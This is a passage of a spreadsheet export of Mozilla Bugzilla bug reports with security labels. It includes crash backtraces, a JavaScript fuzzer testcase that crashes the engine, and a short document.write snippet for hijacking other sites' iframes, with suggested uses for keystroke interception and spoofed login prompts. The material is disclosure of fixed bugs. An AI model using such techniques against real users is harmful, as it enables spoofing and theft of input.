#12 0x088355b3 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0xf7a25210, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:5889
#13 0x0883659f in js::gc::GCRuntime::gcCycle (this=this@entry=0xf7a25210, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6110
#14 0x0883691b in js::gc::GCRuntime::collect (this=this@entry=0xf7a25210, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6239
#15 0x08836ca2 in js::gc::GCRuntime::gc (this=0xf7a25210, gckind=GC_NORMAL, reason=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6300
#16 0x088377b9 in js::gc::GCRuntime::runDebugGC (this=this@entry=0xf7a25210) at js/src/jsgc.cpp:6735
#17 0x0825e11b in js::gc::GCRuntime::gcIfNeededPerAllocation (this=0xf7a25210, cx=cx@entry=0xf7a03240) at js/src/gc/Allocator.cpp:28
#18 0x082a3016 in js::gc::GCRuntime::checkAllocatorState&lt;(js::AllowGC)1&gt; (this=0xf7a25210, cx=0xf7a03240, kind=js::gc::FIRST) at js/src/gc/Allocator.cpp:55
#19 0x082ac802 in js::Allocate&lt;JSObject, (js::AllowGC)1&gt; (cx=cx@entry=0xf7a03240, kind=kind@entry=js::gc::FIRST, nDynamicSlots=0, heap=heap@entry=js::gc::TenuredHeap, clasp=clasp@entry=0x97cb060 &lt;JSFunction::class_&gt;) at js/src/gc/Allocator.cpp:121
#20 0x083bf7fc in JSObject::create (cx=0xf7a03240, kind=js::gc::FIRST, heap=js::gc::TenuredHeap, shape=..., group=...) at js/src/jsobjinlines.h:315
#21 0x087ec6f5 in NewObject (cx=0xf7a03240, group=..., kind=js::gc::FIRST, newKind=js::SingletonObject, initialShapeFlags=0) at js/src/jsobj.cpp:684
#22 0x087ed7a9 in js::NewObjectWithClassProtoCommon (cxArg=cxArg@entry=0xf7a03240, clasp=clasp@entry=0x97cb060 &lt;JSFunction::class_&gt;, protoArg=protoArg@entry=..., allocKind=allocKind@entry=js::gc::FIRST, newKind=newKind@entry=js::SingletonObject) at js/src/jsobj.cpp:817
#23 0x08841f77 in NewObjectWithClassProto (newKind=js::SingletonObject, allocKind=js::gc::FIRST, proto=..., clasp=0x97cb060 &lt;JSFunction::class_&gt;, cx=0xf7a03240) at js/src/jsobjinlines.h:707
#24 js::NewFunctionWithProto (cx=0xf7a03240, native=0x819d360 &lt;dateTimeFormat_toSource(JSContext*, unsigned int, JS::Value*)&gt;, nargs=0, flags=JSFunction::NATIVE_FUN, enclosingDynamicScope=..., atom=..., proto=..., allocKind=js::gc::FIRST, newKind=js::SingletonObject) at js/src/jsfun.cpp:2014
#25 0x0884458b in NewNativeFunction (newKind=js::GenericObject, allocKind=js::gc::FIRST, atom=..., nargs=0, native=0x819d360 &lt;dateTimeFormat_toSource(JSContext*, unsigned int, JS::Value*)&gt;, cx=0xf7a03240) at js/src/jsfun.cpp:1956
#26 js::DefineFunction (cx=cx@entry=0xf7a03240, obj=..., id=id@entry=..., native=0x819d360 &lt;dateTimeFormat_toSource(JSContext*, unsigned int, JS::Value*)&gt;, nargs=0, flags=0, flags@entry=512, allocKind=allocKind@entry=js::gc::FIRST, newKind=newKind@entry=js::GenericObject) at js/src/jsfun.cpp:2267
#27 0x087adfda in JS_DefineFunctions (cx=cx@entry=0xf7a03240, obj=obj@entry=..., fs=0x97a43f4 &lt;dateTimeFormat_methods+20&gt;, fs@entry=0x97a43e0 &lt;dateTimeFormat_methods&gt;, behavior=behavior@entry=DefineAllProperties) at js/src/jsapi.cpp:3640
#28 0x082211c7 in InitDateTimeFormatClass (global=..., Intl=..., cx=0xf7a03240) at js/src/builtin/Intl.cpp:1672
#29 js::InitIntlClass (cx=cx@entry=0xf7a03240, obj=obj@entry=...) at js/src/builtin/Intl.cpp:2089
#30 0x082fb33b in js::GlobalObject::resolveConstructor (cx=0xf7a03240, global=..., key=JSProto_Intl) at js/src/vm/GlobalObject.cpp:133
#31 0x082fb3da in js::GlobalObject::ensureConstructor (cx=cx@entry=0xf7a03240, global=..., global@entry=..., key=key@entry=JSProto_Intl) at js/src/vm/GlobalObject.cpp:100
#32 0x082fbe65 in js::GlobalObject::initStandardClasses (cx=cx@entry=0xf7a03240, global=global@entry=...) at js/src/vm/GlobalObject.cpp:340
#33 0x08791c1a in JS_EnumerateStandardClasses (cx=cx@entry=0xf7a03240, obj=obj@entry=...) at js/src/jsapi.cpp:1363
#34 0x080d23c4 in global_enumerate (cx=0xf7a03240, obj=...) at js/src/shell/js.cpp:5138
#35 0x0880a59f in Snapshot (cx=cx@entry=0xf7a03240, pobj_=..., pobj_@entry=..., flags=flags@entry=1, props=props@entry=0xffffca00) at js/src/jsiter.cpp:314
#36 0x0884389e in js::GetIterator (cx=cx@entry=0xf7a03240, obj=obj@entry=..., flags=flags@entry=1, objp=objp@entry=...) at js/src/jsiter.cpp:814
#37 0x0884d980 in js::ValueToIterator (cx=0xf7a03240, flags=1, vp=...) at js/src/jsiter.cpp:1089
#38 0x087aa764 in js::jit::Simulator::softwareInterrupt (this=0xf7a7e000, instr=0xf7a02e54) at js/src/jit/arm/Simulator-arm.cpp:2174
#39 0x087aae96 in js::jit::Simulator::decodeType7 (this=0xf7a7e000, instr=0xf7a02e54) at js/src/jit/arm/Simulator-arm.cpp:3280
#40 0x087a8f85 in js::jit::Simulator::instructionDecode (this=this@entry=0xf7a7e000, instr=instr@entry=0xf7a02e54) at js/src/jit/arm/Simulator-arm.cpp:4199
#41 0x087aca0c in execute&lt;false&gt; (this=0xf7a7e000) at js/src/jit/arm/Simulator-arm.cpp:4254
#42 js::jit::Simulator::callInternal (this=this@entry=0xf7a7e000, entry=entry@entry=0xf7c89308 "\377\377\377\352\360O-\351\377\377\377\352\004\320M\342\377\377\377\352\020\212-\355\377\377\377\352\r\200\240\341\377\377\377\352h\220\235\345\377\377\377\352\r\260\240\341\377\377\377\352t\240\235\345\377\377\377", &lt;incomplete sequence \352&gt;) at js/src/jit/arm/Simulator-arm.cpp:4342
#43 0x087ace91 in js::jit::Simulator::call (this=&lt;optimized out&gt;, entry=entry@entry=0xf7c89308 "\377\377\377\352\360O-\351\377\377\377\352\004\320M\342\377\377\377\352\020\212-\355\377\377\377\352\r\200\240\341\377\377\377\352h\220\235\345\377\377\377\352\r\260\240\341\377\377\377\352t\240\235\345\377\377\377", &lt;incomplete sequence \352&gt;, argument_count=&lt;optimized out&gt;, argument_count@entry=8) at js/src/jit/arm/Simulator-arm.cpp:4425
#44 0x084db459 in EnterBaseline (cx=cx@entry=0xf7a03240, data=...) at js/src/jit/BaselineJIT.cpp:125
#45 0x0850adcd in js::jit::EnterBaselineMethod (cx=cx@entry=0xf7a03240, state=...) at js/src/jit/BaselineJIT.cpp:157
#46 0x0831a140 in js::RunScript (cx=cx@entry=0xf7a03240, state=...) at js/src/vm/Interpreter.cpp:694
#47 0x0832cb4a in js::ExecuteKernel (cx=cx@entry=0xf7a03240, script=..., script@entry=..., scopeChainArg=..., thisv=..., newTargetValue=..., type=type@entry=js::EXECUTE_GLOBAL, evalInFrame=evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:978
#48 0x0832cf74 in js::Execute (cx=cx@entry=0xf7a03240, script=script@entry=..., scopeChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:1012
#49 0x087a5b27 in ExecuteScript (cx=cx@entry=0xf7a03240, scope=..., script=script@entry=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4353
#50 0x087a5d26 in JS_ExecuteScript (cx=cx@entry=0xf7a03240, scriptArg=scriptArg@entry=...) at js/src/jsapi.cpp:4384
#51 0x0806b611 in RunFile (compileOnly=false, file=0xf7aea9e0, filename=0xffffdaa2 "min.js", cx=0xf7a03240) at js/src/shell/js.cpp:460
#52 Process (cx=cx@entry=0xf7a03240, filename=0xffffdaa2 "min.js", forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:578
#53 0x080cdb50 in ProcessArgs (op=0xffffd770, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:5831
#54 Shell (envp=&lt;optimized out&gt;, op=0xffffd770, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:6109
#55 main (argc=6, argv=0xffffd8c4, envp=0xffffd8e0) at js/src/shell/js.cpp:6455
eax	0x0	0
ebx	0x9794434	158942260
ecx	0xf7e4388c	-136038260
edx	0x0	0
esi	0xf	15
edi	0xf7c40eac	-138146132
ebp	0xffffbb18	4294949656
esp	0xffffbb00	4294949632
eip	0x86dd45a &lt;js::jit::Instruction::extractCond()+42&gt;
=&gt; 0x86dd45a &lt;js::jit::Instruction::extractCond()+42&gt;:	movl   $0x7af,0x0
   0x86dd464 &lt;js::jit::Instruction::extractCond()+52&gt;:	call   0x80f2560 &lt;abort()&gt;
Happens quite frequently, so marking as fuzzblocker. Also involves GC and assertions about instructions generally sound like they could be security-related, so marking s-s as well.</t>
        </is>
      </c>
      <c r="X95" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" t="n">
        <v>1493768</v>
      </c>
      <c r="B96" t="inlineStr">
        <is>
          <t>2018-09-24 11:42:53 -0700</t>
        </is>
      </c>
      <c r="C96" t="inlineStr">
        <is>
          <t>move "bug_associations" table to django</t>
        </is>
      </c>
      <c r="D96" t="inlineStr">
        <is>
          <t>2018-10-30 13:12:58 -0700</t>
        </is>
      </c>
      <c r="E96" t="n">
        <v>1</v>
      </c>
      <c r="F96" t="n">
        <v>1</v>
      </c>
      <c r="G96" t="n">
        <v>4</v>
      </c>
      <c r="H96" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I96" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J96" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K96" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L96" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M96" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N96" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O96" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P96" t="inlineStr"/>
      <c r="Q96" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R96" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S96" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T96" t="n">
        <v>1</v>
      </c>
      <c r="U96" t="n">
        <v>0</v>
      </c>
      <c r="V96" t="n">
        <v>15</v>
      </c>
      <c r="W96" t="inlineStr">
        <is>
          <t>Socorro maintains a table associating bug ids from Bugzilla to crash signatures. This table is currently maintained by sqlalchemy and alembic. It's fed by the bugzilla crontabber app. It's used by the webapp.
This bug covers re-creating that table in Django, moving all the data over, updating the bugzilla crontabber app and webapp to use the new version, and removing the old one.</t>
        </is>
      </c>
      <c r="X96" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" t="n">
        <v>1842030</v>
      </c>
      <c r="B97" t="inlineStr">
        <is>
          <t>2023-07-06 08:31:40 -0700</t>
        </is>
      </c>
      <c r="C97" t="inlineStr">
        <is>
          <t>After closing the last Private Window, context is not always reset/cleared...</t>
        </is>
      </c>
      <c r="D97" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:23 -0700</t>
        </is>
      </c>
      <c r="E97" t="n">
        <v>1</v>
      </c>
      <c r="F97" t="n">
        <v>1</v>
      </c>
      <c r="G97" t="n">
        <v>2</v>
      </c>
      <c r="H97" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I97" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J97" t="inlineStr">
        <is>
          <t>Private Browsing</t>
        </is>
      </c>
      <c r="K97" t="inlineStr">
        <is>
          <t>Firefox 115</t>
        </is>
      </c>
      <c r="L97" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M97" t="inlineStr">
        <is>
          <t>Windows 11</t>
        </is>
      </c>
      <c r="N97" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O97" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P97" t="inlineStr">
        <is>
          <t>[adv-main117+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q97" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R97" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S97" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T97" t="n">
        <v>1</v>
      </c>
      <c r="U97" t="n">
        <v>0</v>
      </c>
      <c r="V97" t="n">
        <v>22</v>
      </c>
      <c r="W97" t="inlineStr">
        <is>
          <t>Regression of [Bug 1585306](https://bugzilla.mozilla.org/show_bug.cgi?id=1585306)
I have previously reported the regression a long time ago, but it hasn't been addressed yet.
See previous STR first.
I have now found new STR:
1. Open a new Firefox instance. Alternatively, start by closing all private windows and tabs.
2. Open two successive (empty) tabs, loading [Google](https://www.google.com) in each.
3. Close the entire private window that contains the two tabs.
3. Immediately after closing in step 3, open a new private window and navigate to [Gmail](https://mail.google.com).
Expected Result: The Gmail login page (see original STR screenshot) should be loaded.
Actual Result: The Gmail home page (see original STR screenshot) is loaded.
The original screenshots may be different from the current screens, but should suffice.
As a security and privacy issue, I wonder why this hasn't been addressed sooner.</t>
        </is>
      </c>
      <c r="X97" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" t="n">
        <v>380359</v>
      </c>
      <c r="B98" t="inlineStr">
        <is>
          <t>2007-05-10 21:33:41 -0700</t>
        </is>
      </c>
      <c r="C98" t="inlineStr">
        <is>
          <t>Crash [@ nsEventStateManager::GetContentState] [@ nsNativeTheme::CheckBooleanAttr] with -moz-appearance and position: fixed</t>
        </is>
      </c>
      <c r="D98" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E98" t="n">
        <v>1</v>
      </c>
      <c r="F98" t="n">
        <v>1</v>
      </c>
      <c r="G98" t="n">
        <v>3</v>
      </c>
      <c r="H98" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I98" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J98" t="inlineStr">
        <is>
          <t>Widget</t>
        </is>
      </c>
      <c r="K98" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L98" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M98" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N98" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O98" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P98" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q98" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R98" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S98" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T98" t="n">
        <v>1</v>
      </c>
      <c r="U98" t="n">
        <v>0</v>
      </c>
      <c r="V98" t="n">
        <v>47</v>
      </c>
      <c r="W98" t="inlineStr">
        <is>
          <t>Created attachment 264443
testcase (crashes Firefox when loaded)
Loading the testcase in Firefox trunk on Mac (opt or debug) makes it crash.</t>
        </is>
      </c>
      <c r="X98" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" t="n">
        <v>790454</v>
      </c>
      <c r="B99" t="inlineStr">
        <is>
          <t>2012-09-11 15:59:12 -0700</t>
        </is>
      </c>
      <c r="C99" t="inlineStr">
        <is>
          <t>Touch events are shared across iframes</t>
        </is>
      </c>
      <c r="D99" t="inlineStr">
        <is>
          <t>2013-04-30 18:44:37 -0700</t>
        </is>
      </c>
      <c r="E99" t="n">
        <v>1</v>
      </c>
      <c r="F99" t="n">
        <v>1</v>
      </c>
      <c r="G99" t="n">
        <v>3</v>
      </c>
      <c r="H99" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I99" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J99" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K99" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L99" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M99" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N99" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O99" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P99" t="inlineStr">
        <is>
          <t>[adv-main18+]</t>
        </is>
      </c>
      <c r="Q99" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R99" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S99" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T99" t="n">
        <v>1</v>
      </c>
      <c r="U99" t="n">
        <v>0</v>
      </c>
      <c r="V99" t="n">
        <v>62</v>
      </c>
      <c r="W99" t="inlineStr">
        <is>
          <t>Just did some quick tests to see what happens if users attempt to use touch events in two different iframes. In a page with two iframes next to one another, if you touch in one and then the touch in the other, we are able to see touches in the first iframe in the second (and vice versa). You can also look at the target of those touches. If they're both from the same origin, you can also access properties/methods on the target of the second. If they're from different domains, trying to access any properties/methods on that target will result in a "Permission denied to access property" exception being thrown.
Test page:
http://dl.dropbox.com/u/72157/iframetest.html
Chrome for Android leaks the same touches, but also doesn't throw access restriction exceptions. Filed a bug with them:
http://code.google.com/p/chromium/issues/detail?id=148567
iOS 5.1.1 it looks like touches in the second (right hand side) iframe are ignored all of the time. i.e. I never see any touches sent to the second iframe. If I start a drag in it and then move my finger into the first, I see no events until my finger is over the first document (doing that requires that I have touched the first document first so that they don't pan, but the touches I receive in the first document act as if there is only one finger on screen. i.e. its a bit of a mess).</t>
        </is>
      </c>
      <c r="X99" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" t="n">
        <v>382686</v>
      </c>
      <c r="B100" t="inlineStr">
        <is>
          <t>2007-05-31 14:44:20 -0700</t>
        </is>
      </c>
      <c r="C100" t="inlineStr">
        <is>
          <t>[mz2] iframes from other sites can be changed while pointing at about:blank</t>
        </is>
      </c>
      <c r="D100" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E100" t="n">
        <v>0</v>
      </c>
      <c r="F100" t="n">
        <v>0</v>
      </c>
      <c r="G100" t="n">
        <v>3</v>
      </c>
      <c r="H100" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I100" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J100" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K100" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N100" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O100" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P100" t="inlineStr">
        <is>
          <t>[sg:low spoof]</t>
        </is>
      </c>
      <c r="Q100" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R100" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S100" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T100" t="n">
        <v>1</v>
      </c>
      <c r="U100" t="n">
        <v>0</v>
      </c>
      <c r="V100" t="n">
        <v>18</v>
      </c>
      <c r="W100" t="inlineStr">
        <is>
          <t>Firefox seems to allow third parties to replace IFRAME data of unrelated webpages by enabling non-same-domain sites to perform:
  foo = open("","target_name");
  foo.frames['bar'].document.open();
  foo.frames['bar'].document.write(...);
  foo.frames['bar'].document.close();
Where "target_name" is established by being opener of the targeted window, or setting window name before the user navigated away from the attack site, or knowing name assigned by the attacked site (if any).
Now, although newly written IFRAME data will inherit its location and permission from the writing page (and thus won't be able to directly interact with page elements or read window.top.document.cookie), it will be able to pull a couple of nasty tricks, say:
1) Call window.focus() and use onkeydown handler to intercept user's keystrokes on that site.
2) Display offensive, misleading or dangerous contents on trusted sites (spoofed login prompts, etc).
3) Track user behavior, including precise timing of arrival and departure, based on presence of named IFRAMEs.
Visible IFRAMEs are often used to render nested contents (forum or blog posts, photos, advertisements, etc) on various pages; and hidden IFRAMEs are commonly employed for user tracking or pre-XMLHttpRequest browser-server communications. As such, a good number of sites is affected one way or another. 
In general, it sounds like a good idea to restrict document.write and other types of interaction with all types of frames based on creator's domain.</t>
        </is>
      </c>
      <c r="X100" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" t="n">
        <v>1052452</v>
      </c>
      <c r="B101" t="inlineStr">
        <is>
          <t>2014-08-12 06:59:42 -0700</t>
        </is>
      </c>
      <c r="C101" t="inlineStr">
        <is>
          <t>[tracker] Extend the community hub. Make it awesomer.</t>
        </is>
      </c>
      <c r="D101" t="inlineStr">
        <is>
          <t>2014-10-06 06:50:56 -0700</t>
        </is>
      </c>
      <c r="E101" t="n">
        <v>1</v>
      </c>
      <c r="F101" t="n">
        <v>1</v>
      </c>
      <c r="G101" t="n">
        <v>5</v>
      </c>
      <c r="H101" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I101" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J101" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K101" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N101" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P101" t="inlineStr"/>
      <c r="Q101" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R101" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S101" t="inlineStr">
        <is>
          <t>2014Q3</t>
        </is>
      </c>
      <c r="T101" t="n">
        <v>1</v>
      </c>
      <c r="U101" t="n">
        <v>0</v>
      </c>
      <c r="V101" t="n">
        <v>2</v>
      </c>
      <c r="W101" t="inlineStr">
        <is>
          <t>Last quarter we implemented the MVP for the community hub. We don't want to stop there. We want to make it better and we want it to completely replace our Karma app so we can delete it.
We've started brainstorming ideas here:
https://sumo.etherpad.mozilla.org/community-hub-extended</t>
        </is>
      </c>
      <c r="X101" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" t="n">
        <v>25620</v>
      </c>
      <c r="B102" t="inlineStr">
        <is>
          <t>2000-01-28 20:03:37 -0800</t>
        </is>
      </c>
      <c r="C102" t="inlineStr">
        <is>
          <t>checksetup.pl: errors while upgrading from 2.8 to 20-Jan-2000</t>
        </is>
      </c>
      <c r="D102" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E102" t="n">
        <v>1</v>
      </c>
      <c r="F102" t="n">
        <v>1</v>
      </c>
      <c r="G102" t="n">
        <v>4</v>
      </c>
      <c r="H102" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I102" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J102" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L102" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M102" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N102" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P102" t="inlineStr"/>
      <c r="Q102" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R102" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S102" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T102" t="n">
        <v>1</v>
      </c>
      <c r="U102" t="n">
        <v>0</v>
      </c>
      <c r="V102" t="n">
        <v>7</v>
      </c>
      <c r="W102" t="inlineStr">
        <is>
          <t>Overview Description: 
	I installed Bugzilla 2.8, then attempted to update it to the version
I           got from CVS (as of 28-Jan-2000, 21:00 EST).  As instructed, I
reran             checksetup.pl.  It reported several errors.
Steps to Reproduce:
	- Install and initialize Bugzilla 2.8 from the tarball
	- Set yourself up as the (only) user; rerun checksetup.pl to set
up                group memberships
	- Edit the maintainer and urlbase operating parameters using the form
	- Create a bug (in the test product/component)
	- Create a new component in the test product (*no* spaces in its name)
	- Create a bug in the new component
	- Upgrade Bugzilla to the version specified above:
		"cvs update" in an offline directory
		"cvs import" the new version into my local Bugzilla repository
		cd to my local Bugzilla sandbox
		"cvs update -jold -jnew" to merge the changes into my local work
		Resolve conflicts
		"cvs commit"
	- In live Bugzilla directory:
		"cvs update" to finally install the new version
		./checksetup.pl
Actual Results: 
	- checksetup.pl's screen output is included as an attachment
	- database is in an unknown (but presumably inconsistent) state
Expected Results: 
	- no reported errors
Build Date &amp; Platform Bug Found: 
	- Sun Sparc 5
	- Solaris 2.5.1
	- Old Bugzilla: 2.8 tarball
	- New Bugzilla: from CVS as of 28-Jan-2000 21:00 EST
	- Perl 5.005_03
	- DBI 1.13
	- Msql-Mysql-modules 1.2210 
Additional Builds and Platforms Tested On: 
	(none)
Additional Information: 
	- Also attached: localconfig and data/params from *after* the failed
	  checksetup.pl run
	- If I wipe everything clean and do a fresh install of the 20-Jan-2000
	  bugzilla:
		- checksetup.pl does *not* report any errors
		- I can successfully add a bug
	- My local code changes are trivial: fixing #! lines and dicing a MySQL
	  password into globals.pl</t>
        </is>
      </c>
      <c r="X102" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" t="n">
        <v>1447989</v>
      </c>
      <c r="B103" t="inlineStr">
        <is>
          <t>2018-03-22 06:55:14 -0700</t>
        </is>
      </c>
      <c r="C103" t="inlineStr">
        <is>
          <t>Crash [@ js::ReportMagicWordFailure] or Crash [@ js::ConstraintTypeSet::addType] with GC</t>
        </is>
      </c>
      <c r="D103" t="inlineStr">
        <is>
          <t>2023-12-06 07:51:15 -0800</t>
        </is>
      </c>
      <c r="E103" t="n">
        <v>1</v>
      </c>
      <c r="F103" t="n">
        <v>1</v>
      </c>
      <c r="G103" t="n">
        <v>3</v>
      </c>
      <c r="H103" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I103" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J103" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K103" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L103" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M103" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N103" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P103" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main60+]</t>
        </is>
      </c>
      <c r="Q103" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R103" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S103" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T103" t="n">
        <v>1</v>
      </c>
      <c r="U103" t="n">
        <v>0</v>
      </c>
      <c r="V103" t="n">
        <v>23</v>
      </c>
      <c r="W103" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7771df14ea18+ (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --disable-debug --enable-optimize, run with --fuzzing-safe --ion-eager --ion-offthread-compile=off):
var set = () =&gt; summary &gt;&gt;&gt; 0xffffffff;
gczeal(17, 1);
var result = false;
set(result[0]);
Backtrace:
received signal SIGSEGV, Segmentation fault.
MOZ_CrashPrintf (aLine=aLine@entry=2579, aFormat=aFormat@entry=0xe96238 "Got 0x%lx expected magic word 0x%lx") at mfbt/Assertions.cpp:63
